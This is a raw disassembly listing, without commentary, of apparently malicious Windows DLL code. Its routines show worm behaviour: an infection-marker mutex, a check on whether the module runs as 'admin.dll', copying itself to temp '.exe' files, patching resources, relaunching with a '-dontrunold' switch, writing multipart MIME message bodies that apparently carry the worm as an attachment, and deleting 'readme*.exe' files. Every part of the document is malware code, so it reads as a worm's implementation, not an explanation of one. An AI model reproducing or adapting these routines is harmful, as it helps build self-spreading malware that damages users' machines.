sub_361761D7+1Fj 361761FA push 3Ch 361761FC push [ebp+arg_C] 361761FF push [ebp+arg_8] 36176202 push [ebp+arg_0] 36176205 call sub_36176215 3617620A add esp, 10h 3617620D neg eax 3617620F sbb eax, eax 36176211 neg eax 36176213 pop ebp 36176214 retn 36176214 sub_361761D7 endp 36176214 36176215 36176215 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36176215 36176215 ; Attributes: bp-based frame 36176215 36176215 sub_36176215 proc near ; CODE XREF: sub_36175AA9+10Bp 36176215 ; sub_361761D7+2Ep 36176215 36176215 var_10C = dword ptr -10Ch 36176215 var_108 = dword ptr -108h 36176215 var_8 = dword ptr -8 36176215 arg_0 = dword ptr 8 36176215 arg_4 = dword ptr 0Ch 36176215 arg_8 = dword ptr 10h 36176215 arg_C = dword ptr 14h 36176215 36176215 push ebp 36176216 mov ebp, esp 36176218 sub esp, 10Ch 3617621E push ebx 3617621F push esi 36176220 push edi 36176221 mov edi, [ebp+arg_4] 36176224 xor ebx, ebx 36176226 xor esi, esi 36176228 mov [edi], bl 3617622A 3617622A loc_3617622A: ; CODE XREF: sub_36176215+93j 3617622A push 8 3617622C lea eax, [ebp+var_8] 3617622F push ebx 36176230 push eax 36176231 call _memset 36176236 mov eax, [ebp+arg_C] 36176239 add esp, 0Ch 3617623C mov [ebp+var_8], eax 3617623F mov eax, [ebp+arg_0] 36176242 mov [ebp+var_108], eax 36176248 lea eax, [ebp+var_8] 3617624B push eax 3617624C push ebx 3617624D lea eax, [ebp+var_10C] 36176253 push ebx 36176254 push eax 36176255 push ebx 36176256 mov [ebp+var_10C], 1 36176260 call dword_3617AC40 36176266 cmp eax, ebx 36176268 jz short loc_361762AF 3617626A cmp eax, 0FFFFFFFFh 3617626D jz short loc_361762AF 3617626F lea eax, [ebp+var_10C] 36176275 push eax 36176276 push [ebp+arg_0] 36176279 call dword_3617AC60 3617627F test eax, eax 36176281 jz short loc_361762AF 36176283 mov eax, [ebp+arg_8] 36176286 push ebx 36176287 sub eax, esi 36176289 dec eax 3617628A push eax 3617628B lea eax, [esi+edi] 3617628E push eax 3617628F push [ebp+arg_0] 36176292 call dword_3617AC50 36176298 cmp eax, 0FFFFFFFFh 3617629B jz short loc_361762AF 3617629D cmp eax, ebx 3617629F jz short loc_361762AF 361762A1 add esi, eax 361762A3 cmp byte ptr [esi+edi-1], 0Ah 361762A8 jnz short loc_3617622A 361762AA push 1 361762AC pop eax 361762AD jmp short loc_361762B1 361762AF ; ─────────────────────────────────────────────────────────────────────────── 361762AF 361762AF loc_361762AF: ; CODE XREF: sub_36176215+53j 361762AF ; sub_36176215+58j ... 361762AF xor eax, eax 361762B1 361762B1 loc_361762B1: ; CODE XREF: sub_36176215+98j 361762B1 pop edi 361762B2 pop esi 361762B3 pop ebx 361762B4 leave 361762B5 retn 361762B5 sub_36176215 endp 361762B5 361762B6 361762B6 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361762B6 361762B6 ; Attributes: bp-based frame 361762B6 361762B6 sub_361762B6 proc near ; CODE XREF: sub_36175AA9+327p 361762B6 ; sub_36175AA9+3DBp ... 361762B6 361762B6 var_10C = dword ptr -10Ch 361762B6 var_108 = dword ptr -108h 361762B6 var_8 = dword ptr -8 361762B6 arg_0 = dword ptr 8 361762B6 arg_4 = dword ptr 0Ch 361762B6 arg_8 = dword ptr 10h 361762B6 361762B6 push ebp 361762B7 mov ebp, esp 361762B9 sub esp, 10Ch 361762BF push ebx 361762C0 push esi 361762C1 push edi 361762C2 mov edi, [ebp+arg_0] 361762C5 xor ebx, ebx 361762C7 xor esi, esi 361762C9 361762C9 loc_361762C9: ; CODE XREF: sub_361762B6+8Aj 361762C9 push 8 361762CB lea eax, [ebp+var_8] 361762CE push ebx 361762CF push eax 361762D0 call _memset 361762D5 add esp, 0Ch 361762D8 lea eax, [ebp+var_8] 361762DB mov [ebp+var_8], 3Ch 361762E2 mov [ebp+var_108], edi 361762E8 push eax 361762E9 lea eax, [ebp+var_10C] 361762EF push ebx 361762F0 push eax 361762F1 push ebx 361762F2 push ebx 361762F3 mov [ebp+var_10C], 1 361762FD call dword_3617AC40 36176303 cmp eax, ebx 36176305 jz short loc_36176347 36176307 cmp eax, 0FFFFFFFFh 3617630A jz short loc_36176347 3617630C lea eax, [ebp+var_10C] 36176312 push eax 36176313 push edi 36176314 call dword_3617AC60 3617631A test eax, eax 3617631C jz short loc_36176347 3617631E mov eax, [ebp+arg_8] 36176321 push ebx 36176322 sub eax, esi 36176324 push eax 36176325 mov eax, [ebp+arg_4] 36176328 add eax, esi 3617632A push eax 3617632B push edi 3617632C call dword_3617AC48 36176332 cmp eax, 0FFFFFFFFh 36176335 jz short loc_36176347 36176337 cmp eax, ebx 36176339 jz short loc_36176342 3617633B add esi, eax 3617633D cmp esi, [ebp+arg_8] 36176340 jl short loc_361762C9 36176342 36176342 loc_36176342: ; CODE XREF: sub_361762B6+83j 36176342 push 1 36176344 pop eax 36176345 jmp short loc_36176349 36176347 ; ─────────────────────────────────────────────────────────────────────────── 36176347 36176347 loc_36176347: ; CODE XREF: sub_361762B6+4Fj 36176347 ; sub_361762B6+54j ... 36176347 xor eax, eax 36176349 36176349 loc_36176349: ; CODE XREF: sub_361762B6+8Fj 36176349 pop edi 3617634A pop esi 3617634B pop ebx 3617634C leave 3617634D retn 3617634D sub_361762B6 endp 3617634D 3617634E 3617634E ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617634E 3617634E 3617634E _DllMain@12 proc near ; CODE XREF: start+4Bp 3617634E 3617634E arg_0 = dword ptr 14h 3617634E 3617634E push ecx 3617634F push ebx 36176350 push ebp 36176351 push esi 36176352 xor esi, esi 36176354 push edi 36176355 push esi 36176356 push 80000h 3617635B push esi 3617635C mov dword_3617ACB4, esi 36176362 call ds:HeapCreate 36176368 cmp eax, esi 3617636A mov dword_3617ACB4, eax 3617636F jz loc_36176506 36176375 push [esp+4+arg_0] 36176379 call sub_36176AE6 3617637E cmp eax, 1 36176381 pop ecx 36176382 mov dword_3617D708, eax 36176387 jz short loc_361763D7 36176389 push [esp+4+arg_0] 3617638D call sub_36176A22 36176392 mov esi, ds:CreateMutexA 36176398 mov edi, ds:GetLastError 3617639E test eax, eax 361763A0 pop ecx 361763A1 mov ebp, offset aFsdhqherwqi200 ; "fsdhqherwqi2001" 361763A6 mov ebx, 0B7h 361763AB jnz short loc_36176408 361763AD xor eax, eax 361763AF cmp dword_3617D708, eax 361763B5 jnz short loc_36176408 361763B7 push ebp 361763B8 push eax 361763B9 push eax 361763BA call esi ; CreateMutexA 361763BC mov [esp+10h], eax 361763C0 call edi ; GetLastError 361763C2 cmp eax, ebx 361763C4 jnz short loc_361763E8 361763C6 cmp dword ptr [esp+10h], 0 361763CB jz short loc_361763D7 361763CD push dword ptr [esp+10h] 361763D1 call ds:CloseHandle 361763D7 361763D7 loc_361763D7: ; CODE XREF: _DllMain@12+39j 361763D7 ; _DllMain@12+7Dj 361763D7 push dword_3617ACB4 361763DD call ds:HeapDestroy 361763E3 jmp loc_36176506 361763E8 ; ─────────────────────────────────────────────────────────────────────────── 361763E8 361763E8 loc_361763E8: ; CODE XREF: _DllMain@12+76j 361763E8 push dword ptr [esp+10h] 361763EC call ds:CloseHandle 361763F2 push [esp+4+arg_0] 361763F6 call sub_36176511 361763FB pop ecx 361763FC push dword_3617ACB4 36176402 call ds:HeapDestroy 36176408 36176408 loc_36176408: ; CODE XREF: _DllMain@12+5Dj 36176408 ; _DllMain@12+67j 36176408 call sub_361748F9 3617640D cmp dword_3617D708, 0 36176414 jnz short loc_3617641B 36176416 call sub_36174125 3617641B 3617641B loc_3617641B: ; CODE XREF: _DllMain@12+C6j 3617641B push ebp 3617641C push 0 3617641E push 0 36176420 call esi ; CreateMutexA 36176422 mov esi, eax 36176424 call edi ; GetLastError 36176426 cmp eax, ebx 36176428 jnz short loc_36176453 3617642A test esi, esi 3617642C jz short loc_36176435 3617642E push esi 3617642F call ds:CloseHandle 36176435 36176435 loc_36176435: ; CODE XREF: _DllMain@12+DEj 36176435 call dword_3617AC64 3617643B call sub_36174DC8 36176440 push dword_3617ACB4 36176446 call ds:HeapDestroy 3617644C push 0 3617644E jmp loc_36176500 36176453 ; ─────────────────────────────────────────────────────────────────────────── 36176453 36176453 loc_36176453: ; CODE XREF: _DllMain@12+DAj 36176453 push esi 36176454 call ds:CloseHandle 3617645A xor esi, esi 3617645C cmp dword_3617D708, esi 36176462 jnz short loc_361764C6 36176464 push offset aDontrunold ; "dontrunold" 36176469 push offset byte_3617CCB8 3617646E call ds:strstr 36176474 pop ecx 36176475 test eax, eax 36176477 pop ecx 36176478 jnz short loc_361764C6 3617647A push [esp+4+arg_0] 3617647E call sub_36176511 36176483 pop ecx 36176484 call ds:GetTickCount 3617648A push eax 3617648B call ds:srand 36176491 pop ecx 36176492 call ds:rand 36176498 imul eax, 64h 3617649B cdq 3617649C mov ecx, 7FFFh 361764A1 idiv ecx 361764A3 cmp eax, 50h 361764A6 jle short loc_361764AD 361764A8 call sub_36176932 361764AD 361764AD loc_361764AD: ; CODE XREF: _DllMain@12+158j 361764AD call dword_3617AC64 361764B3 call sub_36174DC8 361764B8 push dword_3617ACB4 361764BE call ds:HeapDestroy 361764C4 jmp short loc_361764FF 361764C6 ; ─────────────────────────────────────────────────────────────────────────── 361764C6 361764C6 loc_361764C6: ; CODE XREF: _DllMain@12+114j 361764C6 ; _DllMain@12+12Aj 361764C6 call sub_361766AC 361764CB call sub_361767C9 361764D0 cmp dword_3617D708, esi 361764D6 jnz short loc_361764DD 361764D8 call sub_36171D7C 361764DD 361764DD loc_361764DD: ; CODE XREF: _DllMain@12+188j 361764DD cmp dword_3617ACB0, esi 361764E3 jz short loc_361764EE 361764E5 cmp dword_3617D708, 63h 361764EC jnz short loc_361764F4 361764EE 361764EE loc_361764EE: ; CODE XREF: _DllMain@12+195j 361764EE push esi 361764EF call sub_36171F05 361764F4 361764F4 loc_361764F4: ; CODE XREF: _DllMain@12+19Ej 361764F4 call dword_3617AC64 361764FA call sub_36174DC8 361764FF 361764FF loc_361764FF: ; CODE XREF: _DllMain@12+176j 361764FF push esi 36176500 36176500 loc_36176500: ; CODE XREF: _DllMain@12+100j 36176500 call ds:ExitProcess 36176506 36176506 loc_36176506: ; CODE XREF: _DllMain@12+21j 36176506 ; _DllMain@12+95j 36176506 push 1 36176508 pop eax 36176509 pop edi 3617650A pop esi 3617650B pop ebp 3617650C pop ebx 3617650D pop ecx 3617650E retn 0Ch 3617650E _DllMain@12 endp 3617650E 36176511 36176511 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36176511 36176511 ; Attributes: bp-based frame 36176511 36176511 sub_36176511 proc near ; CODE XREF: _DllMain@12+A8p 36176511 ; _DllMain@12+130p 36176511 36176511 var_864 = dword ptr -864h 36176511 var_854 = byte ptr -854h 36176511 var_454 = byte ptr -454h 36176511 var_254 = byte ptr -254h 36176511 var_54 = dword ptr -54h 36176511 var_24 = word ptr -24h 36176511 var_10 = byte ptr -10h 36176511 arg_0 = dword ptr 8 36176511 36176511 push ebp 36176512 mov ebp, esp 36176514 sub esp, 854h 3617651A push ebx 3617651B push esi 3617651C push edi 3617651D push [ebp+arg_0] 36176520 call sub_36176A22 36176525 test eax, eax 36176527 pop ecx 36176528 mov edi, offset byte_3617B4B8 3617652D jnz loc_361765BD 36176533 call sub_36174A06 36176538 mov esi, 400h 3617653D mov ebx, offset byte_3617B0B8 36176542 push esi 36176543 push ebx 36176544 call ds:GetWindowsDirectoryA 3617654A push ebx 3617654B call sub_3617186E 36176550 pop ecx 36176551 mov ebx, offset byte_3617ACB8 36176556 push esi 36176557 push ebx 36176558 call ds:GetSystemDirectoryA 3617655E push ebx 3617655F call sub_3617186E 36176564 pop ecx 36176565 push edi 36176566 push esi 36176567 call ds:GetTempPathA 3617656D push edi 3617656E call sub_3617186E 36176573 pop ecx 36176574 call ds:GetCommandLineA 3617657A push eax 3617657B push offset byte_3617CCB8 36176580 call _strcpy 36176585 pop ecx 36176586 mov ebx, offset byte_3617D0B8 3617658B pop ecx 3617658C push ebx 3617658D push esi 3617658E call ds:GetCurrentDirectoryA 36176594 push ebx 36176595 call sub_3617186E 3617659A mov dword ptr [esp], offset SHELL32DLL ; "SHELL32.DLL" 361765A1 call ds:LoadLibraryA 361765A7 push offset aShellexecutea ; "ShellExecuteA" 361765AC push eax 361765AD mov dword_3617AC9C, eax 361765B2 call ds:GetProcAddress 361765B8 mov dword_3617AC94, eax 361765BD 361765BD loc_361765BD: ; CODE XREF: sub_36176511+1Cj 361765BD mov ebx, ds:GetModuleFileNameA 361765C3 lea eax, [ebp+var_454] 361765C9 push 200h 361765CE push eax 361765CF push [ebp+arg_0] 361765D2 call ebx ; GetModuleFileNameA 361765D4 xor esi, esi 361765D6 test eax, eax 361765D8 jnz short loc_361765E9 361765DA lea eax, [ebp+var_454] 361765E0 push 200h 361765E5 push eax 361765E6 push esi 361765E7 call ebx ; GetModuleFileNameA 361765E9 361765E9 loc_361765E9: ; CODE XREF: sub_36176511+C7j 361765E9 lea eax, [ebp+var_254] 361765EF push eax 361765F0 push esi 361765F1 push offset mep ; "mep" 361765F6 push edi 361765F7 call ds:GetTempFileNameA 361765FD lea eax, [ebp+var_254] 36176603 push offset dot_exe ; ".exe" 36176608 push eax 36176609 call _strcat 3617660E pop ecx 3617660F lea eax, [ebp+var_254] 36176615 pop ecx 36176616 push esi 36176617 push eax 36176618 lea eax, [ebp+var_454] 3617661E push eax 3617661F call ds:CopyFileA 36176625 lea eax, [ebp+var_254] 3617662B push 1 3617662D push eax 3617662E call sub_361719A3 36176633 push 44h 36176635 lea eax, [ebp+var_54] 36176638 pop edi 36176639 push edi 3617663A push esi 3617663B push eax 3617663C call _memset 36176641 push 10h 36176643 lea eax, [ebp+var_10] 36176646 push esi 36176647 push eax 36176648 call _memset 3617664D lea eax, [ebp+var_254] 36176653 mov [ebp+var_54], edi 36176656 push eax 36176657 lea eax, [ebp+var_854] 3617665D push eax 3617665E mov [ebp+var_24], si 36176662 call _strcpy 36176667 lea eax, [ebp+var_854] 3617666D push offset aDontrunold_0 ; " -dontrunold" 36176672 push eax 36176673 call _strcat 36176678 add esp, 30h 3617667B lea eax, [ebp+var_10] 3617667E push eax 3617667F lea eax, [ebp+var_54] 36176682 push eax 36176683 push esi 36176684 push esi 36176685 push esi 36176686 push esi 36176687 push esi 36176688 lea eax, [ebp+var_854] 3617668E push esi 3617668F push eax 36176690 push esi 36176691 call ds:CreateProcessA 36176697 lea eax, [ebp+var_254] 3617669D push eax 3617669E call sub_36171899 361766A3 pop ecx 361766A4 push 1 361766A6 pop eax 361766A7 pop edi 361766A8 pop esi 361766A9 pop ebx 361766AA leave 361766AB retn 361766AB sub_36176511 endp 361766AB 361766AC 361766AC ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361766AC 361766AC ; Attributes: bp-based frame 361766AC 361766AC sub_361766AC proc near ; CODE XREF: _DllMain@12+178p 361766AC 361766AC var_C = byte ptr -0Ch 361766AC var_4 = dword ptr -4 361766AC 361766AC push ebp 361766AD mov ebp, esp 361766AF sub esp, 0Ch 361766B2 push ebx 361766B3 push esi 361766B4 push edi 361766B5 call sub_3617164B 361766BA mov ebx, offset byte_3617C4B8 361766BF xor esi, esi 361766C1 push ebx 361766C2 push esi 361766C3 push offset mep ; "mep" 361766C8 push offset byte_3617B4B8 361766CD call ds:GetTempFileNameA 361766D3 push ebx 361766D4 call ds:DeleteFileA 361766DA push offset dot_exe ; ".exe" 361766DF push ebx 361766E0 call _strcat 361766E5 pop ecx 361766E6 pop ecx 361766E7 push esi 361766E8 push ebx 361766E9 push offset byte_3617C0B8 361766EE call ds:CopyFileA 361766F4 push 80h 361766F9 push ebx 361766FA call ds:SetFileAttributesA 36176700 push esi 36176701 push ebx 36176702 call ds:BeginUpdateResourceA 36176708 mov esi, offset aNull ; "NULL" 3617670D lea edi, [ebp-0Ch] 36176710 movsd 36176711 movsb 36176712 push 1 36176714 lea ecx, [ebp-0Ch] 36176717 pop edi 36176718 mov [ebp-4], eax 3617671B push edi 3617671C push ecx 3617671D push 804h 36176722 push 66h 36176724 push 0Ah 36176726 push eax 36176727 call ds:UpdateResourceA 3617672D xor esi, esi 3617672F push esi 36176730 push dword ptr [ebp-4] 36176733 call ds:EndUpdateResourceA 36176739 push esi 3617673A push ebx 3617673B call sub_361719A3 36176740 push ebx 36176741 call sub_36171899 36176746 add esp, 0Ch 36176749 push esi 3617674A push esi 3617674B push 3 3617674D push esi 3617674E push 3 36176750 push 0C0000000h 36176755 push ebx 36176756 call ds:CreateFileA 3617675C mov ebx, eax 3617675E cmp ebx, 0FFFFFFFFh 36176761 jz short loc_361767C2 36176763 push esi 36176764 push esi 36176765 push 0D0h 3617676A push ebx 3617676B call ds:SetFilePointer 36176771 cmp eax, 0FFFFFFFFh 36176774 jz short loc_361767BB 36176776 cmp dword_3617A410, esi 3617677C jnz short loc_36176796 3617677E lea eax, [ebp-4] 36176781 push esi 36176782 push eax 36176783 push 4 36176785 push offset dword_3617A410 3617678A push ebx 3617678B mov [ebp-4], esi 3617678E call ds:ReadFile 36176794 jmp short loc_361767AC 36176796 ; ─────────────────────────────────────────────────────────────────────────── 36176796 36176796 loc_36176796: ; CODE XREF: sub_361766AC+D0j 36176796 lea eax, [ebp-4] 36176799 push esi 3617679A push eax 3617679B push 4 3617679D push offset dword_3617A410 361767A2 push ebx 361767A3 mov [ebp-4], esi 361767A6 call ds:WriteFile 361767AC 361767AC loc_361767AC: ; CODE XREF: sub_361766AC+E8j 361767AC test eax, eax 361767AE jnz short loc_361767BB 361767B0 push ebx 361767B1 call ds:CloseHandle 361767B7 xor eax, eax 361767B9 jmp short loc_361767C4 361767BB ; ─────────────────────────────────────────────────────────────────────────── 361767BB 361767BB loc_361767BB: ; CODE XREF: sub_361766AC+C8j 361767BB ; sub_361766AC+102j 361767BB push ebx 361767BC call ds:CloseHandle 361767C2 361767C2 loc_361767C2: ; CODE XREF: sub_361766AC+B5j 361767C2 mov eax, edi 361767C4 361767C4 loc_361767C4: ; CODE XREF: sub_361766AC+10Dj 361767C4 pop edi 361767C5 pop esi 361767C6 pop ebx 361767C7 leave 361767C8 retn 361767C8 sub_361766AC endp 361767C8 361767C9 361767C9 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361767C9 361767C9 361767C9 sub_361767C9 proc near ; CODE XREF: _DllMain@12+17Dp 361767C9 361767C9 var_410 = dword ptr -410h 361767C9 var_40C = dword ptr -40Ch 361767C9 var_408 = byte ptr -408h 361767C9 var_400 = byte ptr -400h 361767C9 361767C9 sub esp, 410h 361767CF push ebx 361767D0 push ebp 361767D1 push esi 361767D2 lea eax, [esp+1Ch] 361767D6 push edi 361767D7 xor ebx, ebx 361767D9 push eax 361767DA push ebx 361767DB push offset mep ; "mep" 361767E0 push offset byte_3617B4B8 361767E5 call ds:GetTempFileNameA 361767EB lea eax, [esp+20h] 361767EF push ebx 361767F0 push eax 361767F1 push offset byte_3617C0B8 361767F6 call ds:CopyFileA 361767FC mov ebp, 80h 36176801 lea eax, [esp+20h] 36176805 push ebp 36176806 push eax 36176807 call ds:SetFileAttributesA 3617680D lea eax, [esp+20h] 36176811 push ebx 36176812 push eax 36176813 call ds:BeginUpdateResourceA 36176819 mov esi, offset aNull ; "NULL" 3617681E lea edi, [esp+18h] 36176822 lea ecx, [esp+18h] 36176826 push 1 36176828 movsd 36176829 push ecx 3617682A push 804h 3617682F push 66h 36176831 push 0Ah 36176833 push eax 36176834 mov [esp+28h], eax 36176838 movsb 36176839 call ds:UpdateResourceA 3617683F push ebx 36176840 push dword ptr [esp+14h] 36176844 call ds:EndUpdateResourceA 3617684A mov esi, offset byte_3617C8B8 3617684F push esi 36176850 push ebx 36176851 push offset mep ; "mep" 36176856 push offset byte_3617B4B8 3617685B call ds:GetTempFileNameA 36176861 mov edi, ds:CreateFileA 36176867 push ebx 36176868 push ebp 36176869 push 2 3617686B push ebx 3617686C push ebx 3617686D push 40000000h 36176872 push esi 36176873 call edi ; CreateFileA 36176875 cmp eax, 0FFFFFFFFh 36176878 mov [esp+10h], eax 3617687C jnz short write_MIME 3617687E push esi 3617687F mov esi, ds:DeleteFileA 36176885 call esi ; DeleteFileA 36176887 lea eax, [esp+20h] 3617688B push eax 3617688C call esi ; DeleteFileA 3617688E jmp short loc_361768EF 36176890 ; ─────────────────────────────────────────────────────────────────────────── 36176890 36176890 write_MIME: ; CODE XREF: sub_361767C9+B3j 36176890 lea eax, [esp+14h] 36176894 push ebx 36176895 push eax 36176896 push offset MIME_header ; "MIME-Version: 1.0\r\nContent-Type: multip"... 3617689B call _strlen 361768A0 pop ecx 361768A1 push eax 361768A2 push offset MIME_header ; "MIME-Version: 1.0\r\nContent-Type: multip"... 361768A7 push dword ptr [esp+20h] 361768AB call ds:WriteFile 361768B1 push dword ptr [esp+10h] 361768B5 call ds:CloseHandle 361768BB lea eax, [esp+20h] 361768BF push esi 361768C0 push eax 361768C1 call sub_36175256 361768C6 pop ecx 361768C7 lea eax, [esp+24h] 361768CB pop ecx 361768CC push eax 361768CD call ds:DeleteFileA 361768D3 push ebx 361768D4 push ebp 361768D5 push 4 361768D7 push ebx 361768D8 push ebx 361768D9 push 40000000h 361768DE push esi 361768DF call edi ; CreateFileA 361768E1 mov edi, eax 361768E3 cmp edi, 0FFFFFFFFh 361768E6 jnz short loc_361768F3 361768E8 push esi 361768E9 call ds:DeleteFileA 361768EF 361768EF loc_361768EF: ; CODE XREF: sub_361767C9+C5j 361768EF xor eax, eax 361768F1 jmp short loc_36176927 361768F3 ; ─────────────────────────────────────────────────────────────────────────── 361768F3 361768F3 loc_361768F3: ; CODE XREF: sub_361767C9+11Dj 361768F3 push 2 361768F5 push ebx 361768F6 push ebx 361768F7 push edi 361768F8 call ds:SetFilePointer 361768FE lea eax, [esp+14h] 36176902 push ebx 36176903 mov esi, offset a_abc1234567890 ; "\r\n\r\n--====_ABC1234567890DEF_====\r\n\r\n" 36176908 push eax 36176909 push esi 3617690A mov [esp+20h], ebx 3617690E call _strlen 36176913 pop ecx 36176914 push eax 36176915 push esi 36176916 push edi 36176917 call ds:WriteFile 3617691D push edi 3617691E call ds:CloseHandle 36176924 push 1 36176926 pop eax 36176927 36176927 loc_36176927: ; CODE XREF: sub_361767C9+128j 36176927 pop edi 36176928 pop esi 36176929 pop ebp 3617692A pop ebx 3617692B add esp, 410h 36176931 retn 36176931 sub_361767C9 endp 36176931 36176932 36176932 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36176932 36176932 36176932 sub_36176932 proc near ; CODE XREF: _DllMain@12+15Ap 36176932 36176932 var_15C = dword ptr -15Ch 36176932 var_150 = dword ptr -150h 36176932 var_14C = byte ptr -14Ch 36176932 var_120 = byte ptr -120h 36176932 36176932 sub esp, 144h 36176938 push ebx 36176939 push ebp 3617693A push esi 3617693B push edi 3617693C mov edi, 400h 36176941 push edi 36176942 push 8 36176944 push dword_3617ACB4 3617694A call dword_3617AC74 36176950 mov esi, eax 36176952 test esi, esi 36176954 jz loc_36176A17 3617695A mov ebp, offset byte_3617B4B8 3617695F push edi 36176960 push ebp 36176961 push esi 36176962 call ds:strncpy 36176968 push esi 36176969 call sub_3617186E 3617696E push ebp 3617696F call _strlen 36176974 mov ebx, ds:strncat 3617697A mov ecx, edi 3617697C sub ecx, eax 3617697E push ecx 3617697F push offset aReadme_exe ; "\\readme*.exe" 36176984 push esi 36176985 call ebx ; strncat 36176987 add esp, 20h 3617698A lea eax, [esp+160h+var_14C] 3617698E push eax 3617698F push esi 36176990 call ds:FindFirstFileA 36176996 cmp eax, 0FFFFFFFFh 36176999 mov [esp+160h+var_150], eax 3617699D jnz short loc_361769B0 3617699F push esi 361769A0 push 0 361769A2 push dword_3617ACB4 361769A8 call dword_3617AC70 361769AE jmp short loc_36176A14 361769B0 ; ─────────────────────────────────────────────────────────────────────────── 361769B0 361769B0 loc_361769B0: ; CODE XREF: sub_36176932+6Bj 361769B0 ; sub_36176932+C8j 361769B0 push edi 361769B1 push ebp 361769B2 push esi 361769B3 call ds:strncpy 361769B9 push esi 361769BA call _strlen 361769BF mov ecx, edi 361769C1 sub ecx, eax 361769C3 push ecx 361769C4 push offset asc_36179474 ; "\\" 361769C9 push esi 361769CA call ebx ; strncat 361769CC push esi 361769CD call _strlen 361769D2 mov ecx, edi 361769D4 sub ecx, eax 361769D6 lea eax, [esp+180h+var_120] 361769DA push ecx 361769DB push eax 361769DC push esi 361769DD call ebx ; strncat 361769DF add esp, 2Ch 361769E2 push esi 361769E3 call ds:DeleteFileA 361769E9 lea eax, [esp+160h+var_14C] 361769ED push eax 361769EE push [esp+164h+var_150] 361769F2 call ds:FindNextFileA 361769F8 test eax, eax 361769FA jnz short loc_361769B0 361769FC push esi 361769FD push eax 361769FE push dword_3617ACB4 36176A04 call dword_3617AC70 36176A0A push [esp+16Ch+var_15C] 36176A0E call ds:FindClose 36176A14 36176A14 loc_36176A14: ; CODE XREF: sub_36176932+7Cj 36176A14 push 1 36176A16 pop eax 36176A17 36176A17 loc_36176A17: ; CODE XREF: sub_36176932+22j 36176A17 pop edi 36176A18 pop esi 36176A19 pop ebp 36176A1A pop ebx 36176A1B add esp, 144h 36176A21 retn 36176A21 sub_36176932 endp ; sp = -18h 36176A21 36176A22 36176A22 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36176A22 36176A22 ; Attributes: bp-based frame 36176A22 36176A22 sub_36176A22 proc near ; CODE XREF: _DllMain@12+3Fp 36176A22 ; sub_36176511+Fp ... 36176A22 36176A22 var_420 = byte ptr -420h 36176A22 var_20 = byte ptr -20h 36176A22 arg_0 = dword ptr 8 36176A22 36176A22 push ebp 36176A23 mov ebp, esp 36176A25 sub esp, 420h 36176A2B push ebx 36176A2C push esi 36176A2D mov esi, ds:GetModuleFileNameA 36176A33 push edi 36176A34 and [ebp+var_420], 0 36176A3B mov edi, 400h 36176A40 lea eax, [ebp+var_420] 36176A46 push edi 36176A47 push eax 36176A48 push [ebp+arg_0] 36176A4B call esi ; GetModuleFileNameA 36176A4D test eax, eax 36176A4F jnz short loc_36176A5D 36176A51 lea eax, [ebp+var_420] 36176A57 push edi 36176A58 push eax 36176A59 push 0 36176A5B call esi ; GetModuleFileNameA 36176A5D 36176A5D loc_36176A5D: ; CODE XREF: sub_36176A22+2Dj 36176A5D lea eax, [ebp+var_420] 36176A63 push eax 36176A64 call _strlen 36176A69 mov ebx, eax 36176A6B pop ecx 36176A6C cmp ebx, 5 36176A6F jl short loc_36176ADE 36176A71 lea esi, [ebp+ebx+var_420] 36176A78 lea eax, [esi-4] 36176A7B push eax 36176A7C lea eax, [ebp+var_20] 36176A7F push eax 36176A80 call _strcpy 36176A85 mov edi, ds:_strlwr 36176A8B lea eax, [ebp+var_20] 36176A8E push eax 36176A8F call edi ; _strlwr 36176A91 lea eax, [ebp+var_20] 36176A94 push offset dot_exe ; ".exe" 36176A99 push eax 36176A9A call _strcmp 36176A9F add esp, 14h 36176AA2 test eax, eax 36176AA4 jz short loc_36176ADE 36176AA6 cmp ebx, 0Ah 36176AA9 jge short loc_36176AAF 36176AAB xor eax, eax 36176AAD jmp short loc_36176AE1 36176AAF ; ─────────────────────────────────────────────────────────────────────────── 36176AAF 36176AAF loc_36176AAF: ; CODE XREF: sub_36176A22+87j 36176AAF add esi, 0FFFFFFF7h 36176AB2 lea eax, [ebp+var_20] 36176AB5 push esi 36176AB6 push eax 36176AB7 call _strcpy 36176ABC lea eax, [ebp+var_20] 36176ABF push eax 36176AC0 call edi ; _strlwr 36176AC2 lea eax, [ebp+var_20] 36176AC5 push offset aAdmin_dll_1 ; "admin.dll" 36176ACA push eax 36176ACB call _strcmp 36176AD0 add esp, 14h 36176AD3 neg eax 36176AD5 sbb eax, eax 36176AD7 and al, 9Dh 36176AD9 add eax, 63h 36176ADC jmp short loc_36176AE1 36176ADE ; ─────────────────────────────────────────────────────────────────────────── 36176ADE 36176ADE loc_36176ADE: ; CODE XREF: sub_36176A22+4Dj 36176ADE ; sub_36176A22+82j 36176ADE push 1 36176AE0 pop eax 36176AE1 36176AE1 loc_36176AE1: ; CODE XREF: sub_36176A22+8Bj 36176AE1 ; sub_36176A22+BAj 36176AE1 pop edi 36176AE2 pop esi 36176AE3 pop ebx 36176AE4 leave 36176AE5 retn 36176AE5 sub_36176A22 endp 36176AE5 36176AE6 36176AE6 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36176AE6 36176AE6 ; Attributes: bp-based frame 36176AE6 36176AE6 sub_36176AE6 proc near ; CODE XREF: _DllMain@12+2Bp 36176AE6 36176AE6 var_864 = dword ptr -864h 36176AE6 var_854 = byte ptr -854h 36176AE6 var_454 = byte ptr -454h 36176AE6 var_54 = dword ptr -54h 36176AE6 var_24 = word ptr -24h 36176AE6 var_10 = byte ptr -10h 36176AE6 arg_0 = dword ptr 8 36176AE6 36176AE6 push ebp 36176AE7 mov ebp, esp 36176AE9 sub esp, 854h 36176AEF push esi 36176AF0 push edi 36176AF1 push [ebp+arg_0] 36176AF4 call sub_36176A22 36176AF9 cmp eax, 63h 36176AFC pop ecx 36176AFD jnz loc_36176C0C 36176B03 xor esi, esi 36176B05 push offset aFsdhqherwqi200 ; "fsdhqherwqi2001" 36176B0A push esi 36176B0B push esi 36176B0C call ds:CreateMutexA 36176B12 mov edi, eax 36176B14 call ds:GetLastError 36176B1A cmp eax, 0B7h 36176B1F jnz short loc_36176B34 36176B21 cmp edi, esi 36176B23 jz short loc_36176B2C 36176B25 push edi 36176B26 call ds:CloseHandle 36176B2C 36176B2C 